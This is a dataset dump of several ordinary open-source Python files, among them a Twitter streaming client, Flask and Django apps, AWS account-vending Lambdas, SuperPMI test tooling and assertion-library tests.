metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JimmyCore/Bdls-twitter-data-streaming",
"score": 2
} |
#### File: JimmyCore/Bdls-twitter-data-streaming/filtered_stream.py
```python
import sys
import requests
import os
import json
import re
# To set your enviornment variables in your terminal run the following line:
# export 'BEARER_TOKEN'='<your_bearer_token>
bearer_token = '<KEY>'
def remove_whitespaces(twt):
pattern = re.compile(r'\s+')
return re.sub(pattern, '', twt)
def remove_emojis(data):
emoj = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002500-\U00002BEF" # chinese char
u"\U00002702-\U000027B0"
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
u"\U0001f926-\U0001f937"
u"\U00010000-\U0010ffff"
u"\u2640-\u2642"
u"\u2600-\u2B55"
u"\u200d"
u"\u23cf"
u"\u23e9"
u"\u231a"
u"\ufe0f" # dingbats
u"\u3030"
"]+", re.UNICODE)
return re.sub(emoj, '', data)
def clean_tweet(twt):
twt = twt.lower()
twt = re.sub('#bitcoin', 'bitcoin', twt)
twt = re.sub('#[A-Za-z0-9]+', '', twt)
twt = re.sub('\\n', '', twt)
twt = re.sub('https?:\/\/\S', '', twt)
twt = twt.strip()
return twt
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def get_rules():
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream/rules", auth=bearer_oauth
)
if response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(response.status_code, response.text)
)
return response.json()
def delete_all_rules(rules):
if rules is None or "data" not in rules:
return None
ids = list(map(lambda rule: rule["id"], rules["data"]))
payload = {"delete": {"ids": ids}}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload
)
if response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
response.status_code, response.text
)
)
def set_rules(delete):
# You can adjust the rules if needed
sample_rules = [
{"value": "#bitcoin lang:en", "tag": "#bitcoin"}
]
payload = {"add": sample_rules}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload,
)
if response.status_code != 201:
raise Exception(
"Cannot add rules (HTTP {}): {}".format(response.status_code, response.text)
)
def get_stream(set):
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream", auth=bearer_oauth, stream=True,
)
if response.status_code != 200:
raise Exception(
"Cannot get stream (HTTP {}): {}".format(
response.status_code, response.text
)
)
for response_line in response.iter_lines():
if response_line:
json_response = json.loads(response_line)
json_response = json_response['data']
json_response['text'] = clean_tweet(json_response['text'])
json_response['text'] = remove_emojis(json_response['text'])
json_obj = json.dumps(json_response, indent=4, sort_keys=True)
sys.stdout.write(json_obj)
def main():
rules = get_rules()
delete = delete_all_rules(rules)
set = set_rules(delete)
get_stream(set)
if __name__ == "__main__":
main()
```
#### File: JimmyCore/Bdls-twitter-data-streaming/flink_reader.py
```python
import os
from pyflink.datastream import StreamExecutionEnvironment
from pyflink.table import StreamTableEnvironment, EnvironmentSettings
def main():
# Create streaming environment
env = StreamExecutionEnvironment.get_execution_environment()
settings = EnvironmentSettings.new_instance() \
.in_streaming_mode() \
.use_blink_planner() \
.build()
# create table environment
tbl_env = StreamTableEnvironment.create(stream_execution_environment=env,
environment_settings=settings)
# add kafka connector dependency
kafka_jar = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'flink-sql-connector-kafka_2.11-1.13.0.jar')
tbl_env.get_config() \
.get_configuration() \
.set_string("pipeline.jars", "file://{}".format(kafka_jar))
#######################################################################
# Create Kafka Source Table with DDL
#######################################################################
src_ddl = """
CREATE TABLE tweets (
tweet_id BIGINT,
text VARCHAR(4000),
proctime AS PROCTIME()
) WITH (
'connector' = 'kafka',
'topic' = 'twitter_twt',
'properties.bootstrap.servers' = 'localhost:9092',
'properties.group.id' = 'twitter_twt',
'format' = 'json'
)
"""
tbl_env.execute_sql(src_ddl)
# create and initiate loading of source Table
tbl = tbl_env.from_path('tweets')
print('\nSource Schema')
tbl.print_schema()
#####################################################################
# Define Tumbling Window Aggregate Calculation (Seller Sales Per Minute)
#####################################################################
sql = """
SELECT * FROM tweets
"""
revenue_tbl = tbl_env.sql_query(sql)
if __name__ == '__main__':
main()
``` |
{
"source": "JimmyCushnie/runtime",
"score": 2
} |
#### File: coreclr/scripts/superpmi-replay.py
```python
import argparse
from os import path
import os
from os import listdir
from coreclr_arguments import *
from superpmi_setup import run_command
parser = argparse.ArgumentParser(description="description")
parser.add_argument("-arch", help="Architecture")
parser.add_argument("-platform", help="OS platform")
parser.add_argument("-jit_directory", help="path to the directory containing clrjit binaries")
parser.add_argument("-log_directory", help="path to the directory containing superpmi log files")
jit_flags = [
"JitStressRegs=0",
"JitStressRegs=1",
"JitStressRegs=2",
"JitStressRegs=3",
"JitStressRegs=4",
"JitStressRegs=8",
"JitStressRegs=0x10",
"JitStressRegs=0x80",
"JitStressRegs=0x1000",
]
def setup_args(args):
""" Setup the args for SuperPMI to use.
Args:
args (ArgParse): args parsed by arg parser
Returns:
args (CoreclrArguments)
"""
coreclr_args = CoreclrArguments(args, require_built_core_root=False, require_built_product_dir=False,
require_built_test_dir=False, default_build_type="Checked")
coreclr_args.verify(args,
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(args,
"platform",
lambda unused: True,
"Unable to set platform")
coreclr_args.verify(args,
"jit_directory",
lambda jit_directory: os.path.isdir(jit_directory),
"jit_directory doesn't exist")
coreclr_args.verify(args,
"log_directory",
lambda log_directory: True,
"log_directory doesn't exist")
return coreclr_args
def main(main_args):
"""Main entrypoint
Args:
main_args ([type]): Arguments to the script
"""
python_path = sys.executable
cwd = os.path.dirname(os.path.realpath(__file__))
coreclr_args = setup_args(main_args)
spmi_location = path.join(cwd, "artifacts", "spmi")
log_directory = coreclr_args.log_directory
platform_name = coreclr_args.platform
os_name = "win" if platform_name.lower() == "windows" else "unix"
arch_name = coreclr_args.arch
host_arch_name = "x64" if arch_name.endswith("64") else "x86"
jit_path = path.join(coreclr_args.jit_directory, 'clrjit_{}_{}_{}.dll'.format(os_name, arch_name, host_arch_name))
print("Running superpmi.py download")
run_command([python_path, path.join(cwd, "superpmi.py"), "download", "--no_progress", "-target_os", platform_name,
"-target_arch", arch_name, "-core_root", cwd, "-spmi_location", spmi_location], _exit_on_fail=True)
failed_runs = []
for jit_flag in jit_flags:
log_file = path.join(log_directory, 'superpmi_{}.log'.format(jit_flag.replace("=", "_")))
print("Running superpmi.py replay for {}".format(jit_flag))
_, _, return_code = run_command([
python_path, path.join(cwd, "superpmi.py"), "replay", "-core_root", cwd,
"-jitoption", jit_flag, "-jitoption", "TieredCompilation=0",
"-target_os", platform_name, "-target_arch", arch_name,
"-arch", host_arch_name,
"-jit_path", jit_path, "-spmi_location", spmi_location,
"-log_level", "debug", "-log_file", log_file])
if return_code != 0:
failed_runs.append("Failure in {}".format(log_file))
# Consolidate all superpmi_*.logs in superpmi_platform_architecture.log
final_log_name = path.join(log_directory, "superpmi_{}_{}.log".format(platform_name, arch_name))
print("Consolidating final {}".format(final_log_name))
with open(final_log_name, "a") as final_superpmi_log:
for superpmi_log in listdir(log_directory):
if not superpmi_log.startswith("superpmi_Jit") or not superpmi_log.endswith(".log"):
continue
print("Appending {}".format(superpmi_log))
final_superpmi_log.write("======================================================={}".format(os.linesep))
final_superpmi_log.write("Contents from {}{}".format(superpmi_log, os.linesep))
final_superpmi_log.write("======================================================={}".format(os.linesep))
with open(path.join(log_directory, superpmi_log), "r") as current_superpmi_log:
contents = current_superpmi_log.read()
final_superpmi_log.write(contents)
# Log failures summary
if len(failed_runs) > 0:
final_superpmi_log.write(os.linesep)
final_superpmi_log.write(os.linesep)
final_superpmi_log.write("========Failed runs summary========".format(os.linesep))
final_superpmi_log.write(os.linesep.join(failed_runs))
return 0 if len(failed_runs) == 0 else 1
if __name__ == "__main__":
args = parser.parse_args()
sys.exit(main(args))
``` |
{
"source": "jimmydo/grain",
"score": 3
} |
#### File: grain/tests/__init__.py
```python
from grain import expect
from .utils import assert_raises, assert_raises_assertion
class ExpectedError(Exception):
pass
class ActualError(Exception):
pass
class TestExpect(object):
def test_takes_one_argument(self):
expect(None)
def test_does_not_allow_zero_arguments(self):
with assert_raises(TypeError):
expect()
class TestExtend(object):
def setup(self):
class Extension(object):
def some_method(self):
pass
@classmethod
def some_classmethod(cls):
pass
self.extension = Extension
def test_overrides_base_method(self):
items = []
class Extension(object):
@staticmethod
def fail():
items.append('fail')
expecter = expect.extend(Extension)
expecter.fail()
assert items == ['fail']
def test_right_most_extension_takes_precedence(self):
items = []
class Extension(object):
def some_method(self):
items.append('method')
@classmethod
def some_classmethod(cls):
items.append('classmethod')
expecter = expect.extend(self.extension, Extension)
expecter(None).some_method()
expecter.some_classmethod()
assert items == ['method', 'classmethod']
class TestFail(object):
def test_raises_AssertionError(self):
with assert_raises_assertion(''):
expect.fail()
class TestEqual(object):
def test_passes_for_equal_values(self):
expect('apple').equal('apple')
def test_fails_for_unequal_values(self):
with assert_raises_assertion("Expected 'apple' == 'orange'"):
expect('apple').equal('orange')
class TestNotEqual(object):
def test_passes_for_unequal_values(self):
expect('apple').not_equal('orange')
def test_fails_for_equal_values(self):
with assert_raises_assertion("Expected 'apple' != 'apple'"):
expect('apple').not_equal('apple')
class TestIs(object):
def test_passes_for_same_values(self):
expect(False).is_(False)
def test_fails_for_different_values(self):
with assert_raises_assertion('Expected False is True'):
expect(False).is_(True)
class TestIsNot(object):
def test_passes_for_different_values(self):
expect(False).is_not(True)
def test_fails_for_same_values(self):
with assert_raises_assertion('Expected False is not False'):
expect(False).is_not(False)
class TestLess(object):
def test_passes_for_larger_value(self):
expect(10).less(11)
def test_fails_for_smaller_value(self):
with assert_raises_assertion('Expected 10 < 9'):
expect(10).less(9)
class TestLessEqual(object):
def test_passes_for_larger_value(self):
expect(10).less_equal(11)
def test_passes_for_equal_value(self):
expect(10).less_equal(10)
def test_fails_for_smaller_value(self):
with assert_raises_assertion('Expected 10 <= 9'):
expect(10).less_equal(9)
class TestGreater(object):
def test_passes_for_smaller_value(self):
expect(10).greater(9)
def test_fails_for_larger_value(self):
with assert_raises_assertion('Expected 10 > 11'):
expect(10).greater(11)
class TestGreaterEqual(object):
def test_passes_for_smaller_value(self):
expect(10).greater_equal(9)
def test_passes_for_equal_value(self):
expect(10).greater_equal(10)
def test_fails_for_larger_value(self):
with assert_raises_assertion('Expected 10 >= 11'):
expect(10).greater_equal(11)
class TestAlmostEqual(object):
def test_passes_for_equal_values(self):
expect(1.0000001).almost_equal(1.00000014)
expect(1.0000001).almost_equal(1.00000006)
def test_fails_for_unequal_values(self):
with assert_raises_assertion(
'Expected 1.0000001 almost equal to 1.00000016 (7)'):
expect(1.0000001).almost_equal(1.00000016)
class TestNotAlmostEqual(object):
def test_passes_for_unequal_values(self):
expect(1.0000001).not_almost_equal(1.00000016)
def test_fails_for_equal_values(self):
with assert_raises_assertion(
'Expected 1.0000001 not almost equal to 1.00000014 (7)'):
expect(1.0000001).not_almost_equal(1.00000014)
class TestRaises(object):
def test_passes_for_expected_exception(self):
with expect.raises(ExpectedError):
raise ExpectedError
def test_fails_when_no_exception_is_raised(self):
with assert_raises_assertion(
"Expected code to raise <class 'tests.ExpectedError'>"):
with expect.raises(ExpectedError):
pass
def test_allows_unexpected_exception_to_bubble_up(self):
with assert_raises(ActualError, 'Unexpected exception should bubble up'):
with expect.raises(ExpectedError):
raise ActualError('Unexpected exception should bubble up')
``` |
{
"source": "jimmydong/YEPY2",
"score": 2
} |
#### File: YEPY2/demoV3/app.py
```python
import config # 加载配置文件
import bucketV3 as bucket # 加载全局变量
from flask import Flask, render_template, request, make_response, current_app
from flask_debugtoolbar import DebugToolbarExtension
from flask_uploads import configure_uploads, UploadSet
from werkzeug.utils import import_string
import logging
from logging.handlers import RotatingFileHandler
import time
import cgi
import os
import setproctitle
from job import myJob
from yepy.console import embed
#进程名称
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + config.Config.APP_NAME + ':' + str(config.Config.APP_PORT))
#The Flask Application
def createApp():
app = Flask(__name__)
#注册模块
for bp_name in config.blueprints:
bp = import_string(bp_name)
app.register_blueprint(bp)
#根据情况加载测试或正式配置
if config.is_debug == True:
app.config.from_object(config.DevelopmentConfig)
else:
app.config.from_object(config.ProductionConfig)
return app
app = createApp()
#全局变量初始化
bucket.G.begin_time = time.strftime("%Y-%m-%d %H:%M:%S")
bucket.G.counter = 0
bucket.G.counter_success = 0
#初始化核心插件
bucket.debug.start()
if app.config.get('CACHE_ENABLE'):
bucket.cache.init_app(app, config={'CACHE_TYPE':'memcached'}) # 'simple' | 'memcached' | 'redis'
if app.config.get('DEBUG'):
toolbar = DebugToolbarExtension(app)
if app.config.get('LOG_FILE'):
file_handler = RotatingFileHandler(app.config['LOG_FILE'], maxBytes=app.config['LOG_SIZE'], backupCount=5)
file_handler.setLevel(logging.DEBUG)
app.logger.addHandler(file_handler)
photos = UploadSet(name='photos',extensions=('jpg','gif','png'))
files = UploadSet(name='files',extensions=('txt','rar','zip'))
configure_uploads(app,(photos,files))
# Framework
@app.before_request
def before_request():
if bucket.debug.opened():
bucket.debug.reload()
pass
@app.after_request
def after_request(response):
if request.url_root.find('/static/') > -1:
return response
bucket.debug.time('after')
headers = bucket.debug.show()
if len(headers) > 0:
for key in headers:
response.headers[key] = headers[key]
response.headers["Server"] = "Python/Power by YEPY %s" % config._yepy_application_version
response.headers["Expires"] = "Expires: Mon, 26 Jul 1997 05:00:00 GMT"
response.headers["Cache-Control"] = "no-cache"
response.headers["Pragma"] = "no-cache"
return response
#@app.teardown_request
#def teardown_request():
# pass
with app.app_context():
pass
#上传处理
@app.route("/uploadPhoto", methods=['GET','POST'])
def uploadPhoto():
if request.method == 'POST' and 'photo' in request.files:
filename = photos.save(request.files['photo'])
return photos.url(filename)
else:
return "No photo uploaded!"
#异常处理
@app.errorhandler(404)
def not_found(error):
out = repr(app.url_map)
response = make_response('页面未找到 page not found <br/><pre>' + cgi.escape(out) + '</pre>', 404)
return response
#临时测试
@app.route("/test")
def test():
#print_r(bucket.mongo2.db.collection_names())
test = bucket.mongo2.db.test
test.insert({'test':'hello world'})
return "Hello World!"
if __name__ == '__main__':
#embed()
#设置PID
pid = os.getpid()
pid_file = "app.pid"
with open(pid_file,"w") as f:
f.write(str(pid))
#进程名称
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + str(app.config['APP_PORT']))
#启动工作线程
if bucket.worker.checkStatus() == False:
job = bucket.worker.setJob(myJob)
job.setDaemon(True)
job.start()
bucket.worker.checkStatus()
#启动HTTP监听
app.run(host=app.config['APP_HOST'],port=app.config['APP_PORT'],use_reloader=app.config['USE_RELOADER'])
#程序结束
if bucket.worker.checkStatus() == 'running':
print("warnning: worker is still not finished, force abort.")
if(os.path.exists(pid_file)):
os.remove(pid_file)
print(" ---=== application finished at %s! ===---" % time.strftime("%Y-%m-%d %H:%M:%S"))
```
#### File: lib/controller/__init__.py
```python
from flask import Blueprint, render_template, abort, request, current_app, make_response
from jinja2 import TemplateNotFound
import bucket
_yepy_controller_version = '1.0b'
def init():
# init before action
out = bucket.ConfigG()
return out
def show(out):
# show after action
try:
if bucket._controller == 'index':
response = make_response(render_template('%s.html' % (bucket._action), out=out))
else:
response = make_response(render_template('%s/%s.html' % (bucket._controller,bucket._action), out=out))
return response
except TemplateNotFound:
abort(404)
```
#### File: jimmydong/YEPY2/test.py
```python
import run
def hello():
#想在这里调用统一的debug方法
print(run.v)
run.t.inc()
run.mydebug("hello world" + run.ok)
``` |
{
"source": "JimmyDqv/AWS-Account-Vending-Machine",
"score": 2
} |
#### File: AWS-Account-Vending-Machine/src/createAccount.py
```python
import os
import sys
import boto3
import botocore
import json
import time
from debug import debug_print
from debug import error_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
account_name = event.get("accountName")
account_email = event.get("accountEmail")
account_role = event.get("accountRole")
account_request_id = create_account(
account_name, account_email, account_role)
event["accountRequestId"] = account_request_id
return event
def create_account(name, email, role):
account_request_id = None
client = get_boto_client('organizations')
debug_print(
"Creating account with {} name and e-mail {}".format(name, email))
response = client.create_account(Email=email, AccountName=name,
RoleName=role,
IamUserAccessToBilling="ALLOW")
account_request_id = response['CreateAccountStatus']['Id']
return account_request_id
```
#### File: AWS-Account-Vending-Machine/src/createOU.py
```python
import os
import sys
import boto3
import botocore
import json
import time
from debug import debug_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
ou_name = event.get("ouName")
debug_print("OU Name: {}".format(ou_name))
root_ou_id = get_organization_root_id()
debug_print("Root OU ID: {}".format(root_ou_id))
new_ou_id = create_organizational_unit(root_ou_id, ou_name)
debug_print("New OU ID: {}".format(new_ou_id))
event["rootOuId"] = root_ou_id
event["ouId"] = new_ou_id
return event
def get_organization_root_id():
client = get_boto_client("organizations")
response = client.list_roots()
# debug_print(response)
root_id = response['Roots'][0]['Id']
return root_id
def create_organizational_unit(root_ou_id, ou_name):
debug_print("Creating new OU if needed with name {}".format(ou_name))
ou_id = get_ou_id_for_name(root_ou_id, ou_name)
if ou_id == None:
client = get_boto_client("organizations")
response = client.create_organizational_unit(
ParentId=root_ou_id,
Name=ou_name
)
new_ou_id = response["OrganizationalUnit"]["Id"]
debug_print("Created OU with ID: {}".format(new_ou_id))
return new_ou_id
debug_print("OU already existed. ID: {}".format(ou_id))
return ou_id
def get_ou_id_for_name(root_id, ou_name):
debug_print("get id for {} in {}".format(ou_name, root_id))
client = get_boto_client("organizations")
response = client.list_organizational_units_for_parent(
ParentId=root_id,
MaxResults=10)
ous = response["OrganizationalUnits"]
for ou in ous:
if ou["Name"] == ou_name:
return ou["Id"]
while('NextToken' in response):
response = client.list_organizational_units_for_parent(
ParentId=root_id,
MaxResults=10,
NextToken=response['NextToken']
)
ous = response["OrganizationalUnits"]
for ou in ous:
if ou["Name"] == ou_name:
return True
return None
```
#### File: AWS-Account-Vending-Machine/src/deployCloudFormation.py
```python
import os
import sys
import boto3
import json
import time
from debug import debug_print
from debug import error_print
from botoHelper import get_boto_client
def handler(event, context):
debug_print(json.dumps(event, indent=2))
return main(event)
def main(event):
account_id = event.get("accountId")
account_role = event.get("accountRole")
credentials = assume_role(account_id, account_role)
access_key = credentials['AccessKeyId']
secret_access_key = credentials['SecretAccessKey']
session_token = credentials['SessionToken']
cfn_client = get_boto_client("cloudformation", access_key,
secret_access_key, session_token)
templates = event["cfnTemplates"]
for template in templates:
deploy_cloudformation_template(cfn_client, template, event)
return event
def deploy_cloudformation_template(cfn_client, template, event):
bucket = os.environ['CLOUDFORMATION_TEMPLATE_BUCKET']
templateName = template["templateName"]
stackName = template["stackName"]
debug_print("Deploying CFN Template: {}".format(templateName))
parameters = create_cloudformation_parameters(
template["parameters"], event)
debug_print(json.dumps(parameters, indent=2))
presigned_url = create_s3_presigned_url(bucket, templateName)
debug_print(presigned_url)
if not cloudformation_stack_exists(cfn_client, stackName, "eu-west-1"):
create_cloudformation_stack(
cfn_client, presigned_url, stackName, "eu-west-1", parameters)
else:
update_cloudformation_stack(
cfn_client, presigned_url, stackName, "eu-west-1", parameters)
def create_cloudformation_parameters(parameters, event):
cfnParams = []
for parameter in parameters:
key = parameter["key"]
value = parameter["value"]
if value.startswith("{{") and value.endswith("}}"):
value = value[2:len(value)-2]
value = event.get(value)
cfnParams.append({
'ParameterKey': key,
'ParameterValue': value
})
return cfnParams
def assume_role(account_id, role_name):
debug_print("Assuming role.....")
role_arn = "arn:aws:iam::{0}:role/{1}".format(account_id, role_name)
client = get_boto_client('sts')
assumed_role = client.assume_role(
RoleArn=role_arn,
RoleSessionName="account_vending_machine_lambda"
)
return assumed_role['Credentials']
def create_s3_presigned_url(bucket, object):
client = get_boto_client('s3')
response = client.generate_presigned_url('get_object',
Params={
'Bucket': bucket,
'Key': object
},
ExpiresIn=3600)
return response
def create_cloudformation_stack(client, template_url, stackname, stackregion, parameters):
create_date = time.strftime("%d/%m/%Y")
response = client.create_stack(
StackName=stackname,
TemplateURL=template_url,
Parameters=parameters,
NotificationARNs=[],
Capabilities=[
'CAPABILITY_NAMED_IAM',
],
OnFailure='ROLLBACK',
Tags=[
{
'Key': 'CreatedBy',
'Value': 'Account-Vending-Machine'
},
{
'Key': 'CreatedAt',
'Value': create_date
}
]
)
debug_print("Stack creation in process...")
debug_print(response)
stack_creating = True
while stack_creating is True:
event_list = client.describe_stack_events(
StackName=stackname).get("StackEvents")
stack_event = event_list[0]
if (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'CREATE_COMPLETE'):
stack_creating = False
debug_print("Stack creation completed!")
elif (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'ROLLBACK_COMPLETE'):
stack_creating = False
debug_print("Stack construction failed!!")
else:
debug_print("Stack creating...")
time.sleep(5)
def update_cloudformation_stack(client, template_url, stackname, stackregion, parameters):
debug_print("Updating stack: {}".format(stackname))
try:
update_date = time.strftime("%d/%m/%Y")
response = client.update_stack(
StackName=stackname,
TemplateURL=template_url,
Parameters=parameters,
NotificationARNs=[],
Capabilities=[
'CAPABILITY_NAMED_IAM',
],
Tags=[
{
'Key': 'CreatedBy',
'Value': 'Account-Vending-Machine'
},
{
'Key': 'UpdatedAt',
'Value': update_date
}
]
)
debug_print("Stack update in process...")
debug_print(response)
stack_updating = True
while stack_updating is True:
event_list = client.describe_stack_events(
StackName=stackname).get("StackEvents")
stack_event = event_list[0]
if (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'UPDATE_COMPLETE'):
stack_updating = False
debug_print("Stack update completed!")
elif (stack_event.get('ResourceType') == 'AWS::CloudFormation::Stack' and
stack_event.get('ResourceStatus') == 'UPDATE_ROLLBACK_COMPLETE'):
stack_updating = False
debug_print("Stack update failed!!")
else:
debug_print("Stack updating...")
time.sleep(5)
except Exception as e:
message = getattr(e, 'message', str(e))
# debug_print("------------------------------------")
# debug_print(message)
# debug_print("------------------------------------")
if "No updates are to be performed" not in message:
raise e
else:
debug_print("Stack already up to date!")
def cloudformation_stack_exists(client, stackname, stackregion):
try:
client.describe_stacks(
StackName=stackname
)
return True
except:
return False
``` |
{
"source": "JimmyDqv/blogs-and-sessions-code",
"score": 2
} |
#### File: Http-api-auth0-jwt/src/list-all-unicorns.py
```python
import json
def lambda_handler(event, context):
unicorns = [
{
"name": "Gaia",
"gift": "Speed"
},
{
"name": "Magestic",
"gift": "Magic"
},
{
"name": "Sparkles",
"gift": "Glitter"
}
]
return {
'statusCode': 200,
'body': json.dumps(unicorns)
}
``` |
{
"source": "JimmyDqv/CloudformationMacros",
"score": 2
} |
#### File: Ec2KeyPair/src/create.py
```python
import json
import logging
import string
import random
import boto3
from common import get_params
from common import get_parameter
log = logging.getLogger('Macro-Ec2KeyPair-Create')
log.setLevel(logging.DEBUG)
ec2_client = boto3.client('ec2')
s3_client = boto3.client('s3')
def create_and_store_key_pair(event):
log.debug(json.dumps(event, indent=2))
fragment = event['fragment']
params = get_params(event)
s3_bucket = get_parameter(params, 'S3Bucket', None)
s3_key = get_parameter(params, 'S3Key', None)
key_name = get_parameter(params, 'Keyname', None)
if key_name == None:
key_name = generate_name(20)
if not does_key_pair_exists(key_name):
response = ec2_client.create_key_pair(
KeyName=key_name
)
store_key_material(response, s3_bucket, s3_key)
fragment = key_name
return {
'requestId' : event['requestId'],
'status' : 'success',
'fragment' : fragment
}
def store_key_material(create_response, s3_bucket, s3_key):
key_material = create_response['KeyMaterial']
s3_client.put_object(
Bucket=s3_bucket,
Key=s3_key,
Body=key_material
)
def does_key_pair_exists(name):
try:
ec2_client.describe_key_pairs(
KeyNames=[
name
]
)
return True
except Exception as e:
return False
else:
return False
def generate_name(size=12):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(size))
```
#### File: Ec2KeyPair/src/index.py
```python
import json
import logging
from common import get_params
from common import get_parameter
from common import create_failure
from create import create_and_store_key_pair
from rotate import rotate_key_pair
log = logging.getLogger('Macro-Ec2KeyPair')
log.setLevel(logging.DEBUG)
def handler(event, context):
log.debug(json.dumps(event, indent=2))
params = get_params(event)
operation = get_parameter(params, 'Operation', None)
s3_bucket = get_parameter(params, 'S3Bucket', None)
s3_key = get_parameter(params, 'S3Key', None)
# Operation, S3Bucket and S3Key are always required!
if operation == None or s3_bucket == None or s3_key == None:
return create_failure(event)
if operation == 'CREATE':
return create_and_store_key_pair(event)
elif operation == 'ROTATE':
return rotate_key_pair(event)
return create_failure(event)
``` |
{
"source": "JimmyDqv/gitlab-runners-on-aws",
"score": 2
} |
#### File: lambdas/lookup/lookup-runner.py
```python
import logging
import json
import os
import boto3
logger = logging.getLogger("lookup-runner")
logger.setLevel(logging.DEBUG)
def handler(event, context):
job_name = get_job_name(event)
debug_print(f"Job name: {job_name}")
runner = find_runner_for_job(job_name=job_name)
return {
"Arn": runner['arn'],
"Type": runner['type']
}
def get_job_name(event):
return event['detail']['build_name']
def find_runner_for_job(job_name):
pk = f"job#{job_name}"
dynamodb_client = boto3.client('dynamodb')
response = dynamodb_client.query(
TableName=os.environ["RUNNERS_TABLE"],
KeyConditionExpression='pk = :pk',
ExpressionAttributeValues={
':pk': {'S': pk}
}
)
if len(response['Items']) > 0:
runner = {
"type": response['Items'][0]['type']['S']
}
if runner['type'] == 'LAMBDA':
runner['arn'] = response['Items'][0]['arn']['S'],
else:
runner['arn'] = '-'
return runner
# No runner found, return default
return {
"arn": os.environ['DEFAULT_RUNNER'],
"type": "LAMBDA"
}
def debug_print(message):
logger.debug(message)
```
#### File: gitlab-runners-on-aws/HelperScripts/update_dynamodb_job_registry.py
```python
import argparse
import os
import json
import boto3
def update_dynamo_db(tablename):
with open('job_runner_registry.json') as json_file:
data = json.load(json_file)
for job in data['jobs']:
type = job['type']
name = job['name']
tags = job['tags']
pk = f"job#{name}"
sk = "tags#" + "#".join(tags)
data = {
"pk": pk,
"sk": sk,
"type": type,
}
if type == "LAMBDA":
data["arn"] = job['lambdaArn']
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table(tablename)
table.put_item(Item=data)
print(f'Added Item: {data}')
def get_dynamodb_table(stackname: str) -> str:
cloudformation_client = boto3.client('cloudformation')
stack_resources = cloudformation_client.list_stack_resources(
StackName=stackname
)
for resource in stack_resources['StackResourceSummaries']:
if resource['ResourceType'] == 'AWS::DynamoDB::Table':
if resource['LogicalResourceId'] == 'GitLabJobTagsMapping':
return resource['PhysicalResourceId']
return ''
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--stackname', required=False,
help='The name of the CloudFormation Stack with base infrastructure.')
args = parser.parse_args()
stackname = args.stackname
dynamo_table = get_dynamodb_table(stackname)
print('Adding Mapping....')
update_dynamo_db(dynamo_table)
print('Done!')
if __name__ == '__main__':
main()
``` |
{
"source": "JimmyDuoc/duoc_2020_django",
"score": 2
} |
#### File: duoc_2020_django/clases/models.py
```python
from django.db import models
# Create your models here.
class Clase(models.Model):
title = models.CharField(max_length = 100, verbose_name = "Título")
image = models.ImageField(verbose_name = "Imagen",upload_to="clase")
instructor = models.CharField(max_length = 100, verbose_name = "Instructor")
created = models.DateTimeField(auto_now_add = True, verbose_name= "Fecha Creación")
updated = models.DateTimeField(auto_now = True, verbose_name= "Fecha Modificación")
class Meta:
verbose_name = "clase"
verbose_name_plural = "clases"
ordering = ['-updated','-created']
def __str__(self):
return self.title
```
#### File: duoc_2020_django/contacto/views.py
```python
from django.shortcuts import render,redirect
from django.urls import reverse
from .forms import ContactForm
from .models import Contacto
from django.core.mail import EmailMessage
# Create your views here.
def contacto(request):
contact_form = ContactForm()
if request.method == "POST":
contact_form = ContactForm(data = request.POST)
if contact_form.is_valid():
first_name = request.POST.get('first_name','')
last_name = request.POST.get('last_name','')
email = request.POST.get('email','')
phone = request.POST.get('phone','')
caca = Contacto.objects.create(first_name=first_name,last_name=last_name,email=email,phone=phone)
email = EmailMessage(
"DUOC GYM - Contacto {} {}".format(first_name,last_name),
"Nombre: {} {}\nCorreo Electrónico: {}\nTeléfono: {}".format(first_name,last_name,email,phone),
"<EMAIL>",
["<EMAIL>"],
reply_to=[email]
)
try:
email.send()
return redirect(reverse('contacto') + "?OK")
except:
return redirect(reverse('contacto') + "?FAIL")
return render(request,"contacto/contacto.html",{'form':contact_form})
```
#### File: duoc_2020_django/instructores/views.py
```python
from django.shortcuts import render
from .models import Instructor
# Create your views here.
def instructores(request):
instructores = Instructor.objects.all()
return render(request,"instructores/instructores.html",{'instructores':instructores})
``` |
{
"source": "jimmy-feng/cython",
"score": 2
} |
#### File: Cython/Compiler/Naming.py
```python
pyrex_prefix = "__pyx_"
codewriter_temp_prefix = pyrex_prefix + "t_"
temp_prefix = u"__cyt_"
pyunicode_identifier_prefix = pyrex_prefix + 'U'
builtin_prefix = pyrex_prefix + "builtin_"
arg_prefix = pyrex_prefix + "arg_"
funcdoc_prefix = pyrex_prefix + "doc_"
enum_prefix = pyrex_prefix + "e_"
func_prefix = pyrex_prefix + "f_"
func_prefix_api = pyrex_prefix + "api_f_"
pyfunc_prefix = pyrex_prefix + "pf_"
pywrap_prefix = pyrex_prefix + "pw_"
genbody_prefix = pyrex_prefix + "gb_"
